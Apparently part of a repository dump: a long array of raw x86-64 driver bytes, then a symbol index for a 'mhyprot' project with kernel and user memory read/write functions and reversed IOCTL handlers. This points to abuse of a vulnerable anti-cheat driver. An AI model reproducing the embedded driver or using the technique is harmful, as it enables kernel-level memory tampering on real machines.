0x08, 0x41, 0x8B, 0x4F, 0x08, 0xF7, 0xE9, 0x03, 0xD1, 0xC1, 0xFA, 0x08,
0x8B, 0xC2, 0xC1, 0xE8, 0x1F, 0x03, 0xD0, 0x69, 0xC2, 0x38, 0x01, 0x00,
0x00, 0x2B, 0xC8, 0x48, 0x63, 0xC5, 0x41, 0x89, 0x4F, 0x08, 0x48, 0x3B,
0xC3, 0x72, 0xAF, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x8B, 0x6C, 0x24,
0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5F,
0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C,
0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xEC, 0x50, 0x4C, 0x8B, 0xF1, 0x49, 0x8B, 0xF1, 0x48, 0x8D,
0x0D, 0xB7, 0x59, 0x00, 0x00, 0x4D, 0x8B, 0xF8, 0x8B, 0xEA, 0xE9, 0x19,
0xFF, 0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0x4C, 0x8D, 0x5C, 0x24, 0x50, 0x8B, 0xC3, 0x49,
0x8B, 0x5B, 0x20, 0x49, 0x8B, 0x6B, 0x28, 0x49, 0x8B, 0x73, 0x30, 0x49,
0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x8B,
0xFA, 0x48, 0x8B, 0xD9, 0x48, 0x85, 0xC9, 0x74, 0x56, 0x83, 0xFF, 0x20,
0x72, 0x51, 0x48, 0x8D, 0x0D, 0xCF, 0x58, 0x00, 0x00, 0xE9, 0x6A, 0xFF,
0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x8D, 0x8B, 0x10, 0x27, 0x00, 0x00, 0x81,
0xF9, 0xD0, 0x4E, 0x09, 0x00, 0x77, 0x04, 0x8B, 0xC6, 0xEB, 0x02, 0x33,
0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x74, 0x24, 0x38, 0x48,
0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xF9, 0x8B,
0xEA, 0x48, 0x8D, 0x0D, 0x5C, 0x58, 0x00, 0x00, 0x49, 0x8B, 0xF1, 0x4D,
0x8B, 0xF0, 0xE9, 0x12, 0xFF, 0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5F,
0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x83, 0xEC, 0x28, 0xFF, 0x15, 0xF2, 0x5D,
0x00, 0x00, 0x8B, 0xC0, 0x48, 0xB9, 0x20, 0x03, 0x00, 0x00, 0x80, 0xF7,
0xFF, 0xFF, 0x48, 0x8B, 0x09, 0x48, 0x0F, 0xAF, 0xC8, 0x48, 0xB8, 0x4B,
0x59, 0x86, 0x38, 0xD6, 0xC5, 0x6D, 0x34, 0x48, 0xF7, 0xE9, 0x48, 0xC1,
0xFA, 0x0B, 0x48, 0x8B, 0xC2, 0x48, 0xC1, 0xE8, 0x3F, 0x48, 0x03, 0xC2,
0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28,
0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x38, 0x8B,
0xC9, 0xE8, 0x86, 0x51, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B,
0x4C, 0x24, 0x38, 0xFF, 0x15, 0x7F, 0x5F, 0x00, 0x00, 0x48, 0x8B, 0x44,
0x24, 0x38, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
0x89, 0x78, 0x20, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x30, 0x41, 0x8B, 0xF9,
0x49, 0x8B, 0xF0, 0x4C, 0x8B, 0xF2, 0x8B, 0xD9, 0xE8, 0xA7, 0xFF, 0xFF,
0xFF, 0x48, 0x85, 0xC0, 0x75, 0x19, 0x83, 0xFF, 0x01, 0x0F, 0x85, 0x53,
0x01, 0x00, 0x00, 0x8B, 0xCB, 0xE8, 0xE6, 0x10, 0x00, 0x00, 0x48, 0x85,
0xC0, 0x0F, 0x84, 0x43, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20,
0x48, 0x89, 0x4C, 0x24, 0x28, 0x48, 0x8D, 0x54, 0x24, 0x20, 0x48, 0x8D,
0x4C, 0x24, 0x20, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x48, 0x8B, 0xC8, 0xE8,
0x60, 0x09, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0x1A, 0x01, 0x00, 0x00,
0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0xA6, 0x48, 0x00, 0x00, 0x89, 0x06,
0x85, 0xC0, 0x0F, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8B, 0xC0, 0x33, 0xC9,
0x48, 0x69, 0xD0, 0x18, 0x03, 0x00, 0x00, 0xFF, 0x15, 0x47, 0x5C, 0x00,
0x00, 0x49, 0x89, 0x06, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE9, 0x00, 0x00,
0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x18, 0x03, 0x00, 0x00,
0x48, 0x8B, 0xC8, 0xE8, 0xC8, 0x54, 0x00, 0x00, 0x48, 0x8B, 0x5C, 0x24,
0x20, 0x48, 0x8D, 0x44, 0x24, 0x20, 0x33, 0xFF, 0x48, 0x3B, 0xD8, 0x0F,
0x84, 0xBD, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x7A, 0x5C,
0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0xAC, 0x00, 0x00, 0x00, 0x48, 0x8B,
0xCB, 0x48, 0x8B, 0xEB, 0xFF, 0x15, 0x66, 0x5C, 0x00, 0x00, 0x84, 0xC0,
0x0F, 0x84, 0x98, 0x00, 0x00, 0x00, 0x3B, 0x3E, 0x73, 0x76, 0x8B, 0xC7,
0x41, 0xB8, 0x06, 0x00, 0x00, 0x00, 0x48, 0x69, 0xD0, 0x18, 0x03, 0x00,
0x00, 0x48, 0x8D, 0x43, 0x10, 0x49, 0x03, 0x16, 0x0F, 0x10, 0x00, 0x48,
0x8D, 0x80, 0x80, 0x00, 0x00, 0x00, 0x0F, 0x11, 0x02, 0x48, 0x8D, 0x92,
0x80, 0x00, 0x00, 0x00, 0x0F, 0x10, 0x48, 0x90, 0x0F, 0x11, 0x4A, 0x90,
0x0F, 0x10, 0x40, 0xA0, 0x0F, 0x11, 0x42, 0xA0, 0x0F, 0x10, 0x48, 0xB0,
0x0F, 0x11, 0x4A, 0xB0, 0x0F, 0x10, 0x40, 0xC0, 0x0F, 0x11, 0x42, 0xC0,
0x0F, 0x10, 0x48, 0xD0, 0x0F, 0x11, 0x4A, 0xD0, 0x0F, 0x10, 0x40, 0xE0,
0x0F, 0x11, 0x42, 0xE0, 0x0F, 0x10, 0x48, 0xF0, 0x0F, 0x11, 0x4A, 0xF0,
0x49, 0x83, 0xE8, 0x01, 0x75, 0xAE, 0x0F, 0x10, 0x00, 0x0F, 0x11, 0x02,
0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x42, 0x10, 0x48, 0x8B, 0x1B, 0x33,
0xD2, 0x48, 0x8B, 0xCD, 0xFF, 0xC7, 0xFF, 0x15, 0x74, 0x5B, 0x00, 0x00,
0x48, 0x8D, 0x4C, 0x24, 0x20, 0x48, 0x3B, 0xD9, 0x0F, 0x85, 0x43, 0xFF,
0xFF, 0xFF, 0xB0, 0x01, 0xEB, 0x02, 0x32, 0xC0, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48,
0x8B, 0x7C, 0x24, 0x58, 0x48, 0x83, 0xC4, 0x30, 0x41, 0x5E, 0xC3, 0xCC,
0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48,
0x89, 0x78, 0x18, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x40, 0x48, 0x8B, 0xFA,
0x4C, 0x8B, 0xF1, 0x8B, 0x52, 0x28, 0x48, 0x8D, 0x48, 0xE8, 0xE8, 0xD9,
0x08, 0x00, 0x00, 0x8B, 0x57, 0x30, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8,
0xCC, 0x08, 0x00, 0x00, 0xBA, 0x28, 0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF,
0x15, 0xF3, 0x5A, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x18, 0x03, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x8D, 0x48, 0x10, 0xE8, 0x7F, 0x53, 0x00,
0x00, 0x8B, 0x4F, 0x18, 0xBA, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x3B, 0x54,
0x24, 0x20, 0x48, 0x89, 0x4E, 0x10, 0x8B, 0x4F, 0x20, 0x89, 0x4E, 0x18,
0x0F, 0xB7, 0x4C, 0x24, 0x20, 0x0F, 0x43, 0xD1, 0x48, 0x8D, 0x4E, 0x1C,
0x44, 0x8B, 0xC2, 0x48, 0x8B, 0x54, 0x24, 0x28, 0xE8, 0x0F, 0x50, 0x00,
0x00, 0x0F, 0xB7, 0x44, 0x24, 0x30, 0xB9, 0x03, 0x01, 0x00, 0x00, 0x66,
0x3B, 0x4C, 0x24, 0x30, 0x48, 0x8B, 0x54, 0x24, 0x38, 0x0F, 0x43, 0xC8,
0x44, 0x8B, 0xC1, 0x48, 0x8D, 0x8E, 0x1C, 0x01, 0x00, 0x00, 0xE8, 0xE9,
0x4F, 0x00, 0x00, 0x49, 0x8B, 0x06, 0x4C, 0x39, 0x70, 0x08, 0x74, 0x07,
0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29, 0x48, 0x8B, 0x5C, 0x24, 0x50,
0x48, 0x8B, 0x7C, 0x24, 0x60, 0x48, 0x89, 0x06, 0x4C, 0x89, 0x76, 0x08,
0x48, 0x89, 0x70, 0x08, 0x49, 0x89, 0x36, 0x48, 0x8B, 0x74, 0x24, 0x58,
0x48, 0x83, 0xC4, 0x40, 0x41, 0x5E, 0xC3, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0xF1, 0xBA, 0x28,
0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x2D, 0x5A, 0x00, 0x00, 0x33,
0xD2, 0x41, 0xB8, 0x18, 0x03, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x8D,
0x48, 0x10, 0xE8, 0xB9, 0x52, 0x00, 0x00, 0x4C, 0x8B, 0x45, 0x30, 0x4C,
0x89, 0x47, 0x10, 0x44, 0x8B, 0x45, 0x40, 0x44, 0x89, 0x47, 0x18, 0x41,
0xB8, 0x7F, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0x45, 0x58, 0x66, 0x44, 0x3B,
0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x55, 0x60, 0x48,
0x8D, 0x4F, 0x1C, 0xE8, 0x48, 0x4F, 0x00, 0x00, 0x0F, 0xB7, 0x45, 0x48,
0x41, 0xB8, 0x03, 0x01, 0x00, 0x00, 0x66, 0x44, 0x3B, 0xC0, 0x72, 0x04,
0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x55, 0x50, 0x48, 0x8D, 0x8F, 0x1C,
0x01, 0x00, 0x00, 0xE8, 0x24, 0x4F, 0x00, 0x00, 0x48, 0x8B, 0x06, 0x48,
0x39, 0x70, 0x08, 0x74, 0x07, 0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29,
0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48, 0x89,
0x77, 0x08, 0x48, 0x89, 0x07, 0x48, 0x89, 0x78, 0x08, 0x48, 0x89, 0x3E,
0x48, 0x8B, 0x74, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC,
0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x56,
0x57, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xF2, 0x8B, 0xC9,
0x33, 0xED, 0x48, 0x8D, 0x50, 0x20, 0x48, 0x89, 0x68, 0x20, 0x41, 0x8B,
0xD8, 0x41, 0xB6, 0x01, 0xE8, 0xF3, 0x4D, 0x00, 0x00, 0x48, 0x8B, 0x4C,
0x24, 0x58, 0x85, 0xC0, 0x41, 0x0F, 0xB6, 0xFE, 0x0F, 0x48, 0xFD, 0x48,
0x85, 0xC9, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x24, 0x44, 0x8B, 0xC3, 0x48,
0x8B, 0xD6, 0xE8, 0xB5, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x58,
0x8B, 0xD8, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x41, 0x3A, 0xFE, 0x75, 0x06,
0xFF, 0x15, 0xC2, 0x5B, 0x00, 0x00, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5E,
0x5F, 0x5E, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48,
0x89, 0x70, 0x10, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x30,
0x41, 0x8B, 0xF8, 0x48, 0x8B, 0xF2, 0x41, 0xB7, 0x01, 0x45, 0x33, 0xF6,
0x4C, 0x89, 0x70, 0x20, 0x8B, 0xC9, 0x48, 0x8D, 0x50, 0x20, 0xE8, 0x75,
0x4D, 0x00, 0x00, 0x41, 0x0F, 0xB6, 0xDF, 0x85, 0xC0, 0x41, 0x0F, 0x48,
0xDE, 0x88, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x85,
0xC9, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x28, 0x44, 0x8B, 0xC7, 0x48, 0x8B,
0xD6, 0xE8, 0xF2, 0x02, 0x00, 0x00, 0x8B, 0xF8, 0x48, 0x8B, 0x4C, 0x24,
0x68, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x41, 0x3A, 0xDF, 0x75, 0x06, 0xFF,
0x15, 0x3F, 0x5B, 0x00, 0x00, 0x8B, 0xC7, 0xEB, 0x02, 0x33, 0xC0, 0x48,
0x8B, 0x5C, 0x24, 0x50, 0x48, 0x8B, 0x74, 0x24, 0x58, 0x48, 0x83, 0xC4,
0x30, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x20, 0x44, 0x89, 0x40, 0x18, 0x48,
0x89, 0x50, 0x10, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
0x48, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xE0, 0x48, 0x8B,
0xFA, 0x48, 0x8B, 0xD9, 0x45, 0x33, 0xF6, 0x45, 0x8B, 0xFE, 0x48, 0x85,
0xC9, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0x62, 0x02, 0x00, 0x00, 0xFF, 0x15,
0x10, 0x59, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x40, 0x0F, 0x95, 0xC6, 0x48,
0x8D, 0x54, 0x24, 0x48, 0x48, 0x8B, 0xCB, 0xE8, 0xE6, 0x4C, 0x00, 0x00,
0x90, 0x48, 0x8B, 0xCB, 0x40, 0x84, 0xF6, 0x0F, 0x84, 0x26, 0x01, 0x00,
0x00, 0xFF, 0x15, 0xE9, 0x58, 0x00, 0x00, 0x4C, 0x8B, 0xE0, 0x48, 0x85,
0xC0, 0x0F, 0x84, 0x12, 0x02, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x85, 0xC0,
0x0F, 0x84, 0x07, 0x02, 0x00, 0x00, 0x44, 0x8B, 0x68, 0x0C, 0x41, 0x8B,
0x44, 0x24, 0x0C, 0x48, 0x83, 0xC0, 0x0C, 0x4C, 0x3B, 0xE8, 0x0F, 0x84,
0xF1, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x28, 0x48, 0x8D, 0x4C, 0x24,
0x38, 0xE8, 0xB2, 0x05, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x30, 0x48, 0x8D,
0x4C, 0x24, 0x28, 0xE8, 0xA4, 0x05, 0x00, 0x00, 0x44, 0x3B, 0xBC, 0x24,
0xC0, 0x00, 0x00, 0x00, 0x0F, 0x83, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B,
0xC7, 0x48, 0x69, 0xF0, 0xA0, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x1C, 0x3E,
0x33, 0xD2, 0x41, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4B, 0x0C,
0xE8, 0x4B, 0x50, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02, 0x00,
0x00, 0x48, 0x8D, 0x8E, 0x0C, 0x01, 0x00, 0x00, 0x48, 0x03, 0xCF, 0xE8,
0x34, 0x50, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x18, 0x48, 0x8B, 0x8C, 0x24,
0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x04, 0x0E, 0x41, 0x8B, 0x45, 0x20,
0x89, 0x44, 0x0E, 0x08, 0x0F, 0xB7, 0x44, 0x24, 0x28, 0xB9, 0x7F, 0x00,
0x00, 0x00, 0x44, 0x8B, 0xC1, 0x66, 0x3B, 0x4C, 0x24, 0x28, 0x44, 0x0F,
0x43, 0xC0, 0x48, 0x8B, 0x54, 0x24, 0x30, 0x48, 0x8D, 0x4B, 0x0C, 0xE8,
0xB8, 0x4C, 0x00, 0x00, 0x0F, 0xB7, 0x44, 0x24, 0x38, 0xBB, 0x03, 0x01,
0x00, 0x00, 0x44, 0x8B, 0xC3, 0x66, 0x3B, 0x5C, 0x24, 0x38, 0x44, 0x0F,
0x43, 0xC0, 0x48, 0x8B, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8F, 0x0C, 0x01,
0x00, 0x00, 0x48, 0x03, 0xCE, 0xE8, 0x8E, 0x4C, 0x00, 0x00, 0x41, 0x8B,
0x45, 0x44, 0x48, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89,
0x84, 0x3E, 0x18, 0x03, 0x00, 0x00, 0x41, 0xFF, 0xC6, 0x44, 0x89, 0x74,
0x24, 0x20, 0x41, 0xFF, 0xC7, 0x44, 0x89, 0x7C, 0x24, 0x24, 0x45, 0x8B,
0x6D, 0x00, 0xE9, 0xFB, 0xFE, 0xFF, 0xFF, 0xFF, 0x15, 0xCB, 0x57, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xEC, 0x00, 0x00,
0x00, 0x48, 0x8B, 0x58, 0x18, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xDF, 0x00,
0x00, 0x00, 0x48, 0x8B, 0x5B, 0x10, 0x41, 0xBD, 0x03, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x46, 0x18, 0x48, 0x83, 0xC0, 0x10, 0x48, 0x3B, 0xD8, 0x0F,
0x84, 0xC4, 0x00, 0x00, 0x00, 0x45, 0x3B, 0xFC, 0x0F, 0x83, 0xA3, 0x00,
0x00, 0x00, 0x41, 0x8B, 0xC7, 0x4C, 0x69, 0xE0, 0xA0, 0x03, 0x00, 0x00,
0x48, 0x8D, 0x4F, 0x0C, 0x49, 0x03, 0xCC, 0x33, 0xD2, 0x41, 0xB8, 0x00,
0x01, 0x00, 0x00, 0xE8, 0x40, 0x4F, 0x00, 0x00, 0x48, 0x8D, 0x8F, 0x0C,
0x01, 0x00, 0x00, 0x49, 0x03, 0xCC, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02,
0x00, 0x00, 0xE8, 0x29, 0x4F, 0x00, 0x00, 0x48, 0x8B, 0x43, 0x30, 0x49,
0x89, 0x04, 0x3C, 0x8B, 0x43, 0x40, 0x41, 0x89, 0x44, 0x3C, 0x08, 0x0F,
0xB7, 0x4B, 0x58, 0xB8, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x3B, 0xC1, 0x72,
0x03, 0x0F, 0xB7, 0xC1, 0x4C, 0x8B, 0xC0, 0x48, 0x8B, 0x53, 0x60, 0x48,
0x8D, 0x4F, 0x0C, 0x49, 0x03, 0xCC, 0xE8, 0xB5, 0x4B, 0x00, 0x00, 0x0F,
0xB7, 0x43, 0x48, 0x66, 0x44, 0x3B, 0xE8, 0x44, 0x0F, 0xB7, 0xC0, 0x73,
0x03, 0x4D, 0x8B, 0xC5, 0x48, 0x8B, 0x53, 0x50, 0x48, 0x8D, 0x8F, 0x0C,
0x01, 0x00, 0x00, 0x49, 0x03, 0xCC, 0xE8, 0x91, 0x4B, 0x00, 0x00, 0x8B,
0x83, 0x80, 0x00, 0x00, 0x00, 0x49, 0x89, 0x84, 0x3C, 0x18, 0x03, 0x00,
0x00, 0x44, 0x8B, 0xA4, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xC6,
0x44, 0x89, 0x74, 0x24, 0x20, 0x41, 0xFF, 0xC7, 0x44, 0x89, 0x7C, 0x24,
0x24, 0x48, 0x8B, 0x1B, 0xE9, 0x2B, 0xFF, 0xFF, 0xFF, 0xEB, 0x08, 0x45,
0x33, 0xF6, 0x44, 0x89, 0x74, 0x24, 0x20, 0x48, 0x8D, 0x4C, 0x24, 0x48,
0xE8, 0xA7, 0x4A, 0x00, 0x00, 0x41, 0x8B, 0xC6, 0x4C, 0x8D, 0x9C, 0x24,
0x80, 0x00, 0x00, 0x00, 0x49, 0x8B, 0x5B, 0x30, 0x49, 0x8B, 0x73, 0x48,
0x49, 0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F,
0xC3, 0xCC, 0xCC, 0xCC, 0x44, 0x89, 0x44, 0x24, 0x18, 0x48, 0x89, 0x54,
0x24, 0x10, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
0x57, 0x48, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF2, 0x48,
0x8B, 0xD9, 0x45, 0x33, 0xF6, 0x45, 0x8B, 0xFE, 0x48, 0x85, 0xC9, 0x75,
0x07, 0x33, 0xC0, 0xE9, 0x70, 0x02, 0x00, 0x00, 0xFF, 0x15, 0x5A, 0x56,
0x00, 0x00, 0x48, 0x85, 0xC0, 0x40, 0x0F, 0x95, 0xC7, 0x48, 0x8D, 0x54,
0x24, 0x48, 0x48, 0x8B, 0xCB, 0xE8, 0x30, 0x4A, 0x00, 0x00, 0x90, 0x48,
0x8B, 0xCB, 0x40, 0x84, 0xFF, 0x0F, 0x84, 0x17, 0x01, 0x00, 0x00, 0xFF,
0x15, 0x33, 0x56, 0x00, 0x00, 0x4C, 0x8B, 0xE0, 0x48, 0x85, 0xC0, 0x0F,
0x84, 0x20, 0x02, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x85, 0xC0, 0x0F, 0x84,
0x15, 0x02, 0x00, 0x00, 0x44, 0x8B, 0x68, 0x0C, 0x41, 0x8B, 0x44, 0x24,
0x0C, 0x48, 0x83, 0xC0, 0x0C, 0x4C, 0x3B, 0xE8, 0x0F, 0x84, 0xFF, 0x01,
0x00, 0x00, 0x41, 0x8B, 0x55, 0x28, 0x48, 0x8D, 0x4C, 0x24, 0x38, 0xE8,
0xFC, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x30, 0x48, 0x8D, 0x4C, 0x24,
SYMBOL INDEX (25 symbols across 12 files)
FILE: IDA/FUN_0001d000.cpp
function ulonglong (line 5) | ulonglong IOCTL_FUN_0001d000(
FILE: IDA/FUN_0001d6e0.cpp
function undefined8 (line 8) | undefined8 IOCTL_FUN_0001d6e0(undefined8 param_1,longlong param_2)
FILE: src/file_utils.hpp
type file_utils (line 6) | namespace file_utils
FILE: src/logger.hpp
type logger (line 7) | namespace logger
function log (line 10) | __forceinline void log(const char* format, T const& ... args)
FILE: src/main.cpp
function main (line 23) | int main(int argc, const char** argv)
FILE: src/mhyprot.hpp
type mhyprot (line 27) | namespace mhyprot
type _MHYPROT_INITIALIZE (line 29) | struct _MHYPROT_INITIALIZE
type _MHYPROT_KERNEL_READ_REQUEST (line 36) | struct _MHYPROT_KERNEL_READ_REQUEST
type _MHYPROT_USER_READ_WRITE_REQUEST (line 46) | struct _MHYPROT_USER_READ_WRITE_REQUEST
type detail (line 59) | namespace detail
type driver_impl (line 69) | namespace driver_impl
function T (line 77) | __forceinline T read_kernel_memory(uint64_t address)
function T (line 85) | __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
function write_user_memory (line 93) | __forceinline bool write_user_memory(uint32_t process_id, uint64_t a...
FILE: src/nt.hpp
type _SYSTEM_INFORMATION_CLASS (line 44) | enum _SYSTEM_INFORMATION_CLASS
